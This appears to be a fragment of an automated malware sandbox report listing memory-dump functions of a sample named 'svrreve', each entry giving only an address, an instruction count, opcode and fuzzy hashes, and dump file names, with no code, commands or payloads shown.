                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2daa4c68a1b4e9c2dcde94b4393197a95be0853067d75c46d335f53923bf53d0
                            • Instruction ID: e433794ac64549f0aabee05ed6a5ecaa8f7920f5fef75dd0f396299349fbbef6
                            • Opcode Fuzzy Hash: 2daa4c68a1b4e9c2dcde94b4393197a95be0853067d75c46d335f53923bf53d0
                            • Instruction Fuzzy Hash: 3411D330A09A4E4FE746EB3888256A97FB1EF4A304F1544FAD458CB1E7CE352989C751
                            Function 00007FFD9B9F0838 Relevance: .1, Instructions: 51COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2674f73860a815c7baed7f3f5be5be704bbfcbf314ec4be081ff70c991a51b1d
                            • Instruction ID: 26086c71b298fdeb4fa84ad20747f1e94683a92c68b8510116d6da4278e00975
                            • Opcode Fuzzy Hash: 2674f73860a815c7baed7f3f5be5be704bbfcbf314ec4be081ff70c991a51b1d
                            • Instruction Fuzzy Hash: 0E019212B0E6CB5AE7177BB854B14E43FA0AF03618F0A01F3D4DA8D0E7DD0B19898252
                            Function 00007FFD9B9F11A1 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: edac9992d658698fa6a1242498eea5bfef9d8fe878248cf06ced4310d8394fb0
                            • Instruction ID: 793ac7f19b9b1800a07db3060025649bab99c64d7390ed52a02ef653e61333b6
                            • Opcode Fuzzy Hash: edac9992d658698fa6a1242498eea5bfef9d8fe878248cf06ced4310d8394fb0
                            • Instruction Fuzzy Hash: D5012630B0A64D6FE755EB7488A45E97FB0FF55310F4600F6D489C60A2DA342E84C740
                            Function 00007FFD9B9F4C61 Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 299b5d9bcec3c8ca852ca6dababee12de32bef95005df4fe9c333c996d1cb9de
                            • Instruction ID: 8ab3062db1fe674315e0300e16e785e2815cffa8e0e14e663d698670e1b8287b
                            • Opcode Fuzzy Hash: 299b5d9bcec3c8ca852ca6dababee12de32bef95005df4fe9c333c996d1cb9de
                            • Instruction Fuzzy Hash: 92F04430A0B28CAFDB199B7495657E87FB0BF07300F0610EED0858B1E2DA385A48C702
                            Function 00007FFD9B9F0B09 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f17acfb977c87108b698fccc519f077dfa4b9e349b06277e4ccafdea2daf0c27
                            • Instruction ID: dae8ce80d163d783ce4e4226af95d1a27fd64d30ca494b6ccaacf197a89625c3
                            • Opcode Fuzzy Hash: f17acfb977c87108b698fccc519f077dfa4b9e349b06277e4ccafdea2daf0c27
                            • Instruction Fuzzy Hash: 4E019A31A1A64D9FDB86ABA4C8256EE7BB1FF45311F0100BAD009E61E2DE382A44C752
                            Function 00007FFD9B9F0858 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3a0315a7e03679d26e4a57ed895b2e6fbea3da4d91051cc5321e75125831cf2
                            • Instruction ID: 614e8d6a21841050313e761cfa4b296937b9ee82b139f5e9785926e9ed1c24ce
                            • Opcode Fuzzy Hash: e3a0315a7e03679d26e4a57ed895b2e6fbea3da4d91051cc5321e75125831cf2
                            • Instruction Fuzzy Hash: 63F0A412B0E7CE5EE72327B858B10E43F70AF03518F0A01F3D4D9890E3D91A19598252
                            Function 00007FFD9B9F0AA1 Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb0ad4c28ad3798d543c4738de3f31c2cf289c4dde1266ffd15082910b425d9b
                            • Instruction ID: 22a4e2637b1c1e3df30284964348c8e7dbe864609bc47f1285eb29f593707b88
                            • Opcode Fuzzy Hash: eb0ad4c28ad3798d543c4738de3f31c2cf289c4dde1266ffd15082910b425d9b
                            • Instruction Fuzzy Hash: E4F0F630A0D78D8FE742EB7488696D87FA0EF55300F0601E6D849CB0E7EA355994C301

                            Executed Functions

                            Function 00007FFD9BA01318 Relevance: 2.9, Strings: 1, Instructions: 1695COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1N_^
                            • API String ID: 0-2316127021
                            • Opcode ID: bc465a2f5903eeaee1e430000bf5f6df70c262ca433d89799c29e32ccbb735ff
                            • Instruction ID: 5bddd1c67ef138c6bc93512d24412a2cf35fc6fede9b70992f4b33b70825f579
                            • Opcode Fuzzy Hash: bc465a2f5903eeaee1e430000bf5f6df70c262ca433d89799c29e32ccbb735ff
                            • Instruction Fuzzy Hash: 81728270A0964E8FDB98EF14C8A4BE977B1FF6A300F5001B9D45DD7296CE75A981CB40
                            Function 00007FFD9BA0170A Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID: 1N_^
                            • API String ID: 0-2316127021
                            • Opcode ID: f26b63a70a610691d974d16e8883883d4ce9a2fb762617b718060fae540baee5
                            • Instruction ID: 03cc6920c7f4004bc613c33b1144e5fe4308c509f83b38767b39149ee34822c6
                            • Opcode Fuzzy Hash: f26b63a70a610691d974d16e8883883d4ce9a2fb762617b718060fae540baee5
                            • Instruction Fuzzy Hash: 2B317E30A0D65E8FDB58DF64C8A4AF97BB1FF26300F5500FAD049A71E2CA795A84CB40
                            Function 00007FFD9BA00CB1 Relevance: .4, Instructions: 387COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 98efcce296cb6359edd63865ed55b7436d0b1c7dc794347836d6150e3ef98c94
                            • Instruction ID: 6cb6e82dd9cb6894ad72e77f86a1f99d7f20b35181aa44688902db2911355916
                            • Opcode Fuzzy Hash: 98efcce296cb6359edd63865ed55b7436d0b1c7dc794347836d6150e3ef98c94
                            • Instruction Fuzzy Hash: 29C1AD70E0964D8FD786EF188460A997BB3EF66340B5600E5D01DCB3AADE369D42CB60
                            Function 00007FFD9BA008B5 Relevance: .1, Instructions: 125COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5ec363a12dba16c94c12cfaacced1204b2d5bece564398815ee41cb2527c563e
                            • Instruction ID: 735a502ddae31b087bb2b8bd182214ff79525967f93ad1fe12d7fbdfebdeee97
                            • Opcode Fuzzy Hash: 5ec363a12dba16c94c12cfaacced1204b2d5bece564398815ee41cb2527c563e
                            • Instruction Fuzzy Hash: 05410372E09A4E4FE755DB6888609EDBBB1FF69340F5200BAE049D72E6DE242D06C750
                            Function 00007FFD9BA01105 Relevance: .1, Instructions: 66COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ba451e2f21c42d80a75f71e85099f4a93d0b2d1dcaa14f1dce28201c6cea527
                            • Instruction ID: b050f96e0511b500405e002b29005082e6f273db6ac54db3228c2a2b578e053a
                            • Opcode Fuzzy Hash: 6ba451e2f21c42d80a75f71e85099f4a93d0b2d1dcaa14f1dce28201c6cea527
                            • Instruction Fuzzy Hash: BA117830E0968E0FE746EB2488256E87FB1EF27300F5600E7E458CB1E7DD341A468750
                            Function 00007FFD9BA011A1 Relevance: .0, Instructions: 48COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd494a7060d63eb17e695e6d03d975bcf336750295d5c6666bfdd0bfb027cb4b
                            • Instruction ID: 1dfc157b1a2b658a2311eeb9972f6c248a4a8ce7cd6fdcf1c92d8af685653a59
                            • Opcode Fuzzy Hash: fd494a7060d63eb17e695e6d03d975bcf336750295d5c6666bfdd0bfb027cb4b
                            • Instruction Fuzzy Hash: 12012B71D0A64D4FE755EB6488A41E93FB0EF66200F4600FAE499C70E2DA342A45C700
                            Function 00007FFD9BA00B09 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 59597b542ea689e24583ad29e0a30a11fee7ca3035a92b015424a46a2642ff84
                            • Instruction ID: 059647061429561990ff567a6752dc0f8747714f7e2d2c24fce4b420f9c9e62b
                            • Opcode Fuzzy Hash: 59597b542ea689e24583ad29e0a30a11fee7ca3035a92b015424a46a2642ff84
                            • Instruction Fuzzy Hash: 4701DF31E0A64D8FDB56ABA4CC256EE7BB1FF56301F0100BBD049E61E2DE382644C751
                            Function 00007FFD9BA04C61 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bea2630e037e2515dabafd3fe07f9d79bfc65831f16c36a516a1421804f8ec62
                            • Instruction ID: 5db6ecd26259b2e855cf56f7ba3407f70302e378928c2837d356a4ff6df189f1
                            • Opcode Fuzzy Hash: bea2630e037e2515dabafd3fe07f9d79bfc65831f16c36a516a1421804f8ec62
                            • Instruction Fuzzy Hash: 9FF0287190F2889FD75A9B7495656F87FB0FF03200F4600AEE485971F2EA395A04C702
                            Function 00007FFD9BA00AA1 Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20a58789d303af4b80db627dab56254035db5c03f62dd2347f9beb761917840b
                            • Instruction ID: 10e7a2062fb82d8579e43b57ad8b1607a155a0f245b71d00553b12752c311304
                            • Opcode Fuzzy Hash: 20a58789d303af4b80db627dab56254035db5c03f62dd2347f9beb761917840b
                            • Instruction Fuzzy Hash: 97F0F631D0C78D8FD352EB7488696D87FA0EF66300F4500F6D489CB0E7EA7515848711
                            Function 00007FFD9BA0083F Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 610d24cddc3a553dd39ca91613fcbdbfce82695a48a025bf324b9515af8e9e80
                            • Instruction ID: 97adfccba67a94fc3229fcd1f9a4c7ab420dc67cc962e30cfeccb02bbd05636b
                            • Opcode Fuzzy Hash: 610d24cddc3a553dd39ca91613fcbdbfce82695a48a025bf324b9515af8e9e80
                            • Instruction Fuzzy Hash: 05F05E22A0E2CD4EE73367A858711E53F60AF43608F4A00F7E5D88A0E3D9591A0D83A6
                            Function 00007FFD9BA0087C Relevance: .0, Instructions: 24COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000D.00000002.2277249154.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_7ffd9ba00000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e51b1f6ce31fe5b2a69349ad033e54a907a527848a4667c8e7c3ed2f9f987890
                            • Instruction ID: f9f9ef88bc0f1afc772161f625d78009ce9bd3bbabb2b42a486ab626cf8514b9
                            • Opcode Fuzzy Hash: e51b1f6ce31fe5b2a69349ad033e54a907a527848a4667c8e7c3ed2f9f987890
                            • Instruction Fuzzy Hash: BBE0E52290F7CD4EEB7727A449711A43F60BF43604F4A01F7E5D89A0E3D9996A18C3A6